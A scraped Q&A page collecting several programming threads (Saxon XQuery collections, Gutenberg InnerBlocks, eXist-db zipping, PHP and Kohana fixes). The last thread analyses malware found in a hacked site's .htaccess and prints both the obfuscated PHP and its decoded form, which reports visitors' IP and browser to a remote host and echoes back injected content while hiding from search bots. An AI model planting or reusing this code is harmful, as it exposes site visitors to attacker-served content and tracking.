Can Saxon work on a page with .htaccess? - .htaccess

Due to some issues with the php version of Saxon, I currently have a convoluted setup where I do a php call to execute a java command, convert the results into html, display that html on my page, and then delete the resulting html after display. I can provide a link to the page if it helps, but the actual .xq file is pretty simplistic:
xquery version "1.0" encoding "UTF-8";
declare namespace tei="http://www.tei-c.org/ns/1.0";
declare variable $zone external;
declare variable $line external;
declare variable $collection external;
declare function local:if-empty
( $arg as item()? ,
$value as item()* ) as item()* {
if (string($arg) != '')
then data($arg)
else $value
};
declare function local:remove-elements($input as element(), $remove-names as xs:string*) as element() {
element {node-name($input) }
{$input/#*,
for $child in $input/node()[not(name(.)=$remove-names)]
return
if ($child instance of element())
then local:remove-elements($child, $remove-names)
else $child
}
};
declare function local:remove-empty-elements($nodes as node()*) as node()* {
for $node in $nodes
return
if (empty($node)) then () else
if ($node instance of element())
then if (normalize-space($node) = '')
then ()
else element { node-name($node)}
{ $node/#*,
local:remove-empty-elements($node/node())}
else if ($node instance of document-node())
then local:remove-empty-elements($node/node())
else $node
} ;
<list>
{
let $q:=collection($collection)
let $remove-list := ('note')
(:let $q:=local:remove-empty-elements($q):)
for $y in $q
let $s := $y//tei:surface
let $t := $y//tei:titleStmt/#xml:id
let $m := $y//tei:msDesc/#xml:id
let $z := $s/tei:zone[#n=$zone]
let $l := $z/tei:line[#n=$line]
let $w := concat($y//tei:msDesc/tei:msIdentifier/tei:settlement/text(),', ',$y//tei:msDesc/tei:msIdentifier/tei:institution/text(),' ',$y//tei:msDesc/tei:msIdentifier/tei:idno/text())
let $g := concat($t, "/" , $m, "/", substring-before($l/../../tei:graphic/#url,"."),".html")
let $o:=local:remove-elements($l/tei:orig,$remove-list)
where ($z//tei:line/#n = "l.1")
return
<item>{$w}: <ref target="{$g}">{$o}</ref></item>}
</list>
and the command to run it is java -Xms128m -Xmx1024m -XX:+UseCompressedOops -cp saxon9he.jar net.sf.saxon.Query -t -q:test.xq -o:1505740041.41932650059544.xml line=l.4 zone=EETS.QD.8 collection=file:<filefolder>
My problem is that the xml files I'm working with are currently unpublished transcriptions, and I'd like to keep them behind a password protected folder until I think they're ready for prime time. If I have any sort of .htaccess file in the filefolder location, I get the following error message:
Building tree for file:<filefolder>/.htaccess using class net.sf.saxon.tree.tiny.TinyBuilder
Error on line 1 column 1 of .htaccess:
SXXP0003: Error reported by XML parser: Content is not allowed in prolog.
Query failed with dynamic error: org.xml.sax.SAXParseException; systemId: file:<filefolder>/.htaccess; lineNumber: 1; columnNumber: 1; Content is not allowed in prolog.
It's pretty obvious to me that what's happening is that it's getting to the .htaccess file, which is not XML, and then doesn't know what to do with it. My question is if there's a way in my xquery file to tell Saxon not to include .htaccess in the collection. I'm sure there is, but everything I've found is about finding file names, not about suppressing them in the collection you're building.

If you ever need something more elaborate than selection using a glob pattern, then you can use the uri-collection() function to return the URIs of the files in the directory, and then use doc() to process the ones that you are actually interested in. This would give you a solution if, for example, you wanted everything that doesn't start with ".", regardless of its extension.
Another thing you can do with uri-collection() is to process each returned URI within a try/catch block so you have full control over the error handling.

Ok, I'm just stupid. The solution is to add a concat statement to append the select info to the $collection variable, like so:
let $collection:=concat($collection, '?select=*.xml')
let $q:=collection($collection)
let $remove-list := ('note')

Related

Accessing Nested Attributes in a WordPress Gutenberg block via PHP

I have a working WordPress Gutenberg Block project which uses nested blocks. I'm trying to rewrite the javascript save function in PHP to create a dynamic block.
I've modified the PHP file to include the following:
function render_html($attributes) {
var_dump($attributes);
ob_start(); ?>
<h1>Attributes</h1>
<h3>The number of columns is <?php echo esc_html($attributes['myColumns']) ?>!</h3>
<?php return ob_get_clean();
}
function cards_init() {
register_block_type_from_metadata( __DIR__, array(
'render_callback' => 'render_html'
) );
}
add_action( 'init', 'cards_init' );
This displays the top level attributes correctly (just one value):
C:\Users\Steve\Local Sites\netmonics6\app\public\wp-content\plugins\cards\cards.php:32:
array (size=1)
'myColumns' => int 3
Attributes
The number of columns is 3!
I'm just wondering how I access the attributes for the nested blocks?
I've used Innerblocks in the main edit.js as follows to enable a nested block:
<InnerBlocks
allowedBlocks={['some-name/card']}
orientation="horizontal"
template={[
['some-name/card'],
['some-name/card'],
['some-name/card'],
]}
/>
Does anyone please have any ideas?
Steve
InnerBlocks can be accessed via $block in the render_callback function. The syntax for the render callback is function($attributes, $content, $block) although commonly, only $attributes is used - unless you want to access something <InnerBlocks>, eg:
PHP
/*
* Render callback function
* #return string HTML markup
*/
function render_html($attributes, $content, $block)
{
$output = '';
// Loop through each inner block
foreach ($block->inner_blocks as $inner_block) {
// Eg. If your ['some-name/card'] block had an attribute
// called `someAttribute` (boolean), it could be accessed via:
if ($inner_block->someAttribute == true) {
// Do something different with this block
$output .= sprintf('<div class="is-some-attribute">%s</div>', $inner_block->render());
} else {
// Otherwise, render block as usual..
$output .= $inner_block->render();
}
}
/*
* Tip: Always return the content to render
* echo() should not be used in render_callback() and ob_start/ob_get_clean not needed.
* Returning valid content avoids dreaded "Invalid JSON" error in Editor.
*/
return $output;
}
When using InnerBlocks, the save() function in JavaScript is required so that the block editor saves the InnerBlock content (even if you are using a PHP render_callback), eg:
save.js
export default function save() {
const blockProps = useBlockProps.save();
return (
<div {...blockProps}>
<InnerBlocks.Content />
</div>
)
}
Depending on what you need from the InnerBlocks, block context might also be useful too..

How to zip binary files during function’s run in eXist-db and xQuery

I have no problems with producing pdfs and offering them as response:stream-binary files for download. However, I have problems if I try to zip produced pdfs and do the same with zip. It offers the zip result for download. The pdf is included but has no size (empty file).
let $pdf-binary :=
(
if ($pdfQuality eq 'proof' and $template eq 'draft')
then xslfo:render(transform:transform($doc, $stylesProof, ()), 'application/pdf', (), $proofConf)
else if ($pdfQuality eq 'print' and $template eq 'draft')
then xslfo:render(transform:transform($doc, $stylesPrint, ()), 'application/pdf', (), $printConf)
else if ($pdfQuality eq 'print' and $template eq 'auc-geographica')
then xslfo:render(transform:transform($doc, $stylesAUCGeographica, ()), 'application/pdf', (), $printConf)
else ()
)
return
if (not($zipAll))
then response:stream-binary($pdf-binary, 'application/pdf', $name || '.pdf')
else if ($zipAll)
then (
let $entry := <entry name="{$name}.pdf" type="binary" method="store">{util:binary-doc($pdf-binary)}</entry>
let $zip-file := compression:zip($entry, false())
return
response:stream-binary($zip-file, 'application/zip', 'test.zip')
)
else ()
Important is I don’t want to store pdf results anywhere in the DB.
Done. It was better to slightly rearrange the project. I used the whole logic in the query calling the rendering function. The working result is:
...
let $zip as item() :=
(
let $entries as item()+ :=
(
for $article at $count in $doc/article//tei:TEI
let $year as xs:string := $article//tei:date/string()
let $issue as xs:string := $article//tei:biblScope/string()
let $pdf as xs:base64Binary := fop:render-pdf($article, $template, $name, $pdfQuality)
return
<entry name="{lower-case($name)}-{$year}-{$issue}-{$count}.pdf" type="binary" method="store">{$pdf}</entry>
)
return
compression:zip($entries, false())
)
return
response:stream-binary($zip, 'application/zip', $name || '.zip')
I would be very happy if anyone could revise this solution. I have learned it is really great idea to use strong typing and don’t rely on automatic conversions. Without that this code does not work. Thanks a lot to the book about eXist-db, by Erik Siegel and Adam Retter, where I have seen a hint.

Using contains key with file_get_contents

So I'm trying to read a JSON file at a seperate url and based off what what is in the JSON file I would like for the program to do something. But the way I'm currently trying to do it is not working.
<?php
$homepage = file_get_contents('http://direct.cyberkitsune.net/canibuycubeworld/status.json');
//echo $homepage;
if($homepage contains 'f'){
echo 'true';
}else{
echo 'Something went terribly wrong!";
}
?>
This is the error that I get
Parse error: syntax error, unexpected T_STRING in /home/a1285224/public_html/cubeworld.php on line 4
When I searched up the "file_get_contents" under the php manual it says that it should read the entire file into a string, so I'm a little confused why I'm getting a string error.
Thanks~
In stead of 'contains', see the strpos function. Also, you must close single quotes with single quotes, and double quotes with double quotes.
i.e.
$homepage = file_get_contents("http://direct.cyberkitsune.net/canibuycubeworld/status.json");
// echo $homepage;
if (strpos($homepage, "f") !== false)
{
echo "true";
}
else
{
echo "Somethingwentterriblywrong!";
}
Based on what you are trying to do, also see PHP's JSON library.
To get the JSON data, you can use json_decode.
To dump all vars:
$json = json_decode($homepage, true);
var_dump($json);
To get all the other data:
printf("Time: %s<br>Site: %s<br>Reg: %s<br>Shop: %s", $json['time'], $json['site'], $json['reg'], $json['shop']);

downloading files as a corrupted files in kohana

hi guys i'm facing problem with file upload and download in kohana
my controller is like this:
class Controller_Test extends Controller
{
public function action_display()
{
$type = $_FILES['file']['type'];
switch ($type)
{
case 'image/gif':
$otype='.gif'; break;
case 'image/jpeg':
case 'image/pjpeg':
$otype= '.jpg'; break;
case 'image/png':
$otype= '.png'; break;
case 'application/octet-stream':
$otype='.doc'; break;
case 'txt': $otype='.txt'; break;
case 'application/pdf': $otype='.pdf'; break;
}
//rename the file
$name = time() . '_' . mt_rand(1000,9999).$otype;
$directory = $_SERVER['DOCUMENT_ROOT'].URL::base().'media';
//uploading a file
$filename = Upload::save($_FILES['file'], $name, $directory);
$this->auto_render = false;
$this->response->send_file($filename);
}//action
}//controller
when i call this function file uploaded fine
but downloading file as a corrupted file
help me how to solve this..
thanks in advance.
You shouldn't add URL::base() inside the path name as that could add something like "http://..." inside the file path. Try removing URL::base() and try again.
To start, there's some simple debug checks you can do here.
Is $directory valid?
is $filename a valid file path, or is it FALSE? (See http://kohanaframework.org/3.2/guide/api/Upload#save)
I'm going to assume $directory is invalid.
You want to use the absolute path constants to build directory paths. Instead of using $_SERVER['DOCUMENT_ROOT'].URL::base() (which is wrong in any case)
Rather use APPPATH or DOCROOT, eg $directory = APPPATH.'media'; see https://github.com/kohana/kohana/blob/3.2/master/index.php#L57-74

What does function s37 in htaccess do?

Found a code this morning encoded under several layers attached to a website I administer's .htaccess. The code reads as follows:
function s37($s){for ($a = 0; $a <= strlen($s)-1; $a++ ){$e .= $s{strlen($s)-$a-1};}return($e);}eval(s37(';"ni"=73c$;"ptth"=73h$;"stats"=73z$'));eval(s37(';]"TNEGA_RESU_PTTH"[REVRES_$=3au$'));eval(s37(';)"relbmaR" ,"xednaY" ,"revihcra_ai" ,"toBNSM" ,"prulS" ,"elgooG"(yarra = 73u$'));eval(s37('}};lru$ ohce;]1[lru$ = lru$ ;)lru$,"!og!"(edolpxe = lru${))"!og!",lru$(rtsrts( fi;))]"TSOH_PTTH"[REVRES_$(edocnelru."=h&".)3au$(edocnelru."=b&".]"RDDA_ETOMER"[REVRES_$."=i"."?p"."hp.".73c$."/73c$.".73c$.73c$.73c$.73c$.73c$.73c$.73c$.73c$.73c$."//".":".73h$(stnetnoc_teg_elif# = lru$ ;)00801+)(emit,)"stats"(5dm,73z$(eikooctes# { esle }{ )))]73z$[EIKOOC_$(tessi( ro ))3au$ ,"i/" . )73u$ ,"|"(edolpmi . "/"(hctam_gerp((fi'));
Clearly details of the function are written in reverse. It looks like it is sending log information to a remote server. Anyone familiar with this code or what it is doing?
Looks like pretty heavily obfuscated stat-tracking code, but I'm more inclined to say it's malicious. s37, as noted, reverses the string:
function s37($s)
{
$e = "";
for ($a = 0; $a <= strlen($s)-1; $a++ )
{
$e .= $s{strlen($s)-$a-1};
}
return($e);
}
This, in turn, generates the following code:
$z37="stats";
$h37="http";
$c37="in";
$ua3=$_SERVER["HTTP_USER_AGENT"];
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if((preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_COOKIE[$z37])))
{
}
else
{
#setcookie($z37,md5("stats"),time()+10800);
$url = #file_get_contents($h37.":"."//".$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.".$c37/".$c37.".ph"."p?"."i=".$_SERVER["REMOTE_ADDR"]."&b=".urlencode($ua3)."&h=".urlencode($_SERVER["HTTP_HOST"]));
if (strstr($url,"!go!"))
{
$url = explode("!go!",$url);
$url = $url[1];
echo $url;
}
}
The user-agent matching stuff prevents search engine bots from running the code. Otherwise, for browsers, a cookie gets set, then some code gets downloaded from a remote server and echoed out. The purpose of the code that's downloaded is hard to ascertain without more info.
function s37 reverses the supplied string. function s37 doe only go for the first little bit of the line of code though...

Resources